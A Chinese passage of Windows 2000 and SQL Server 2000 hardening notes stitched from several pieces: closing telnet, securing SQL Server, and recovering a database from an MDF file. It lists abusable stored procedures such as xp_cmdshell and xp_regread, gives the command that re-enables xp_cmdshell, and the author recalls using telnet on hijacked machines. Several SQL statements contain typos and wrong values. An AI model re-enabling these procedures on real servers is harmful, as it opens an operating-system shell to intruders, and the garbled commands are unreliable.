（9）telnet服务（默认23端口）相对于3389来讲，telnet服务更不容易引起管理员的注意，该服务以前是UNIX和Linux类系统提供的远程管理终端服务，windows2000server也提供了，它也是一个终端服务，只不过telnet服务是字符界面，而3389服务是图形界面，二者都能完全远程控制服务器的所有功能。我以前在利用肉鸡的时候，一般都不用3389，为什么呢？该服务速度慢，我一般都是打开肉鸡的telnet服务，速度非常快，功能也很全面，又不容易被发觉 A、如何知道自己的telnet服务是否打开？在windows2000server控制面板——管理工具中有一项“Telnet 服务器管理”(对应的文件是system32中的tlntadmn.exe），这就是该服务的开关，我们可以利用该程序配置我们的telnet服务。打开开始菜单——程序——管理工具——服务，在服务列表中有该服务对应的一项“Telnet”，默认的情况下，该服务状态是“手动”，如果，该服务是“已启动”状态，说明该服务已经启动了，你可以用以下命令连接在windows(98/2000/xp/2003)字符模式下输入： telnet 服务器的IP地址如果出现了登陆界面，非常不幸，你的telnet服务真的已开，如果不是你开的，非常不幸，你被黑了，你可能成为了肉鸡。 B、如何关闭该服务！打开开始菜单——程序——管理工具——服务，在服务中将telnet服务禁用建议：最好将system32中的tlntadmn.exe拷贝出来放到其他文件夹中并改名，并将该文件从system32中删除。随时检查telnet服务的状态，如果该服务是“已启动”状态，而又不是你启动的，最好重新安装服务器系统。最好随时扫描你的服务器所开的端口，如果23端口已开或有一些不知名的端口已开(因为黑客很可能会将提供该服务的端口改为其他的端口来逃避检查），用telnet命令测试一下，看看能不能连接。附：telnet命令格式 telnet ip地址端口如：telnet 192.168.1.1 （连接服务器192.168.1.1的默认23端口）如：telnet 192.168.1.1555 （连接服务器192.168.1.1的555端口） SQL Server 2000的安全配置在进行SQL Server 2000数据库的安全配置之前，首先你必须对操作系统进行安全配置，保证你的操作系统处于安全状态。然后对你要使用的操作数据库软件（程序）进行必要的安全审核，比如对ASP、PHP等脚本，这是很多基于数据库的WEB应用常出现的安全隐患，对于脚本主要是一个过滤问题，需要过滤一些类似 , ‘ @ / 等字符，防止破坏者构造恶意的SQL语句。接着，安装SQL Server2000后请打上补丁sp1以及最新的sp2。 1、使用安全的密码策略我们把密码策略摆在所有安全配置的第一步，请注意，很多数据库帐号的密码过于简单，这跟系统密码过于简单是一个道理。对于sa更应该注意，同时不要让sa帐号的密码写于应用程序或者脚本中。健壮的密码是安全的第一步！SQL Server2000安装的时候，如果是使用混合模式，那么就需要输入sa的密码，除非你确认必须使用空密码。这比以前的版本有所改进。同时养成定期修改密码的好习惯。数据库管理员应该定期查看是否有不符合密码要求的帐号。比如使用下面的SQL语句：Use master Select name,Password from syslogins wherepassword is null

2、使用安全帐号策略：由于SQL Server不能更改sa用户名称，也不能删除这个超级用户，所以，我们必须对这个帐号进行最强的保护，当然，包括使用一个非常强壮的密码，最好不要在数据库应用中使用sa帐号，只有当没有其它方法登录到 SQL Server 实例（例如，当其它系统管理员不可用或忘记了密码）时才使用 sa。建议数据库管理员新建立个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。SQL Server的认证模式有Windows身份认证和混合身份认证两种。如果数据库管理员不希望操作系统管理员来通过操作系统登陆来接触数据库的话，可以在帐号管理中把系统帐号“BUILTIN\Administrators”删除。不过这样做的结果是一旦sa帐号忘记密码的话，就没有办法来恢复了。很多主机使用数据库应用只是用来做查询、修改等简单功能的，请根据实际需要分配帐号，并赋予仅仅能够满足应用要求和需要的权限。比如，只要查询功能的，那么就使用一个简单的public帐号能够select就可以了。

3、加强数据库日志记录：审核数据库登录事件的“失败和成功”，在实例属性中选择“安全性”，将其中的审核级别选定为全部，这样在数据库系统和操作系统日志里面，就详细记录了所有帐号的登录事件。请定期查看SQL Server日志检查是否有可疑的登录事件发生，或者使用DOS命令。findstr /C:"登录" d:\Microsoft SQL Server\MSSQL\LOG\*.*

4、管理扩展存储过程：对存储过程进行大手术，并且对帐号调用扩展存储过程的权限要慎重。其实在多数应用中根本用不到多少系统的存储过程，而SQL Server的这么多系统存储过程只是用来适应广大用户需求的，所以请删除不必要的存储过程，因为有些系统的存储过程能很容易地被人利用起来提升权限或进行破坏。如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句：use master sp_dropextendedproc xp_cmdshellxp_cmdshell是进入操作系统的最佳捷径，是数据库留给操作系统的一个大后门。如果你需要这个存储过程，请用这个语句也可以恢复过来。sp_addextendedproc xp_cmdshell, xpsql70.dll 如果你不需要请丢弃OLE自动存储过程（会造成管理器中的某些特征不能使用），这些过程包括如下：Sp_OACreateSp_OADestroy Sp_OAGetErrorInfo Sp_OAGetProperty Sp_OAMethod Sp_OASetProperty Sp_OAStop 去掉不需要的注册表访问的存储过程，注册表存储过程甚至能够读出操作系统管理员的密码来，如下：Xp_regaddmultistring Xp_regdeletekeyXp_regdeletevalue Xp_regenumvaluesXp_regread Xp_regremovemultistring Xp_regwrite 还有一些其他的扩展存储过程，你也最好检查检查。在处理存储过程的时候，请确认一下，避免造成对数据库或应用程序的伤害。

5、使用协议加密：SQL Server 2000使用的Tabular Data Stream协议来进行网络数据交换，如果不加密的话，所有的网络传输都是明文的，包括密码、数据库内容等等，这是一个很大的安全威胁。能被人在网络中截获到他们需要的东西，包括数据库帐号和密码。所以，在条件容许情况下，最好使用SSL来加密协议，当然，你需要一个证书来支持。

6、不要让人随便探测到你的TCP/IP端口：默认情况下，SQL Server使用1433端口监听，很多人都说SQL Server配置的时候要把这个端口改变，这样别人就不能很容易地知道使用的什么端口了。可惜，通过微软未公开的1434端口的UDP探测可以很容易知道SQL Server使用的什么TCP/IP端口了。不过微软还是考虑到了这个问题，毕竟公开而且开放的端口会引起不必要的麻烦。在实例属性中选择TCP/IP协议的属性。选择隐藏 SQL Server 实例。如果隐藏了 SQL Server 实例，则将禁止对试图枚举网络上现有的 SQL Server 实例的客户端所发出的广播作出响应。这样，别人就不能用1434来探测你的TCP/IP端口了（除非用Port Scan）。

7、修改TCP/IP使用的端口：请在上一步配置的基础上，更改原默认的1433端口。在实例属性中选择网络配置中的TCP/IP协议的属性，将TCP/IP使用的默认端口变为其他端口. 9、拒绝来自1434端口的探测由于1434端口探测没有限制，能够被别人探测到一些数据库信息，而且还可能遭到DOS攻击让数据库服务器的CPU负荷增大，所以对Windows 2000操作系统来说，在IPSec过滤拒绝掉1434端口的UDP通讯，可以尽可能地隐藏你的SQL Server。10、对网络连接进行IP限制SQL Server 2000数据库系统本身没有提供网络连接的安全解决办法，但是Windows 2000提供了这样的安全机制。使用操作系统自己的IPSec可以实现IP数据包的安全性。请对IP连接进行限制，只保证自己的IP能够访问，也拒绝其他IP进行的端口连接，把来自网络上的安全威胁进行有效的控制。关于IPSec的使用请参看： 上面主要介绍的一些SQL Server的安全配置，经过以上的配置，可以让SQL Server本身具备足够的安全防范能力。当然，更主要的还是要加强内部的安全控制和管理员的安全培训，而且安全性问题是一个长期的解决过程，还需要以后进行更多的安全维护一、概述在应用系统中，数据库往往是最核心的部分，一旦数据库毁坏或损坏，将会带来巨大的损失，所以数据库的管理越来越重要。我们在做数据库管理与维护工作中，不可避免会出现各种各样的错误，本文针对数据库的日志文件丢失时如何利用MDF文件恢复数据库的方法进行了研究。二、数据库的恢复当数据库的主数据MDF文件完好无损时，在丢失了LDF文件的情况下，如何利用MDF文件恢复数据库？我们把SQL Server的日志文件分为两类：一类是无活动事务的日志，另一类是含活动事务的日志，根据不同的日志，采取不同的方法来恢复数据库。　

1. 无活动事务的日志恢复：无活动事务的日志丢失时，我们很容易利用MDF文件直接恢复数据库，具体方法如下：

①.分离被质疑的数据库，可用企业管理器中的"分离数据库工具"，或者用存储过程sp_detach_db分离数据库；②利用MDF文件附加数据库生成新的日志文件，可用企业管理器中的"附加数据库"的工具，或者用存储过程sp_attach_single_file_db附加数据库。如果数据库的日志文件中含有活动事务，利用此方法就不能恢复数据库。

2. 含活动事务的日志恢复：含有活动事务的日志丢失时，利用上述方法就会出现"数据库和日志文件不符合，不能附加数据库"。对于这种情况下，我们采用如下方法：

①新建同名数据库AAA，并设它为紧急模式•停止SQL Server服务器；•把数据库主数据MDF文件移走；•启SQL Server服务器，新建一个同名的数据库AAA；•停止SQL Server服务器，把移走的MDF文件再覆盖回来；•启动SQL Server服务器，把AAA设为紧急模式，不过默认情况下，系统表是不能随便修改的，必须首先设置一下使其能被修改，运行以下语句即可： Use Master Gosp_configure ’allow updates’,1 reconfigure with override Go 接着运行以下语句，把AAA数据库设为紧急模式，即把Sysdatabases表中AAA数据库的status属性设为’37268’,就表示把AAA数据库处于紧急模式。 updatesysdatabases set status=32768 where hame=’AAA’如果没有报告什么错误，就可以进行以下操作。

②设置数据库AAA为单用户模式，并检查数据库•重启SQL Server服务器；•把数据库AAA设为单用户模式Sp_dboption ’AAA’, ’single user’, ’true’ •运行以下语句，检查数据库AAA DBCCCHECKDB(’AAA’) 如果没有什么大的问题就可以把数据库的状态改回去。

③还原数据库的状态运行以下语句，就可以把数据库的状态还原： update sysdatabases set status=28 wherename=’AAA’ sp_configure ’allow updates’,0 reconfigure with override Go 如果没有什么大的问题，刷新一下数据库，数据库AAA又会出现在你面前，但目前恢复工作还没有做完，此时的数据库仍不能工作，还要进行下面的处理，才能真正恢复。④利用DTS的导入导出向导，把数据库AAA导入到一个新建数据库BBB中•新建一个数据库BBB; •右击BBB，选择IMPORT功能，打开导入向导；•目标源选择"在SQL Server数据库之间复制对象和数据库"，这样可以把表结构，数据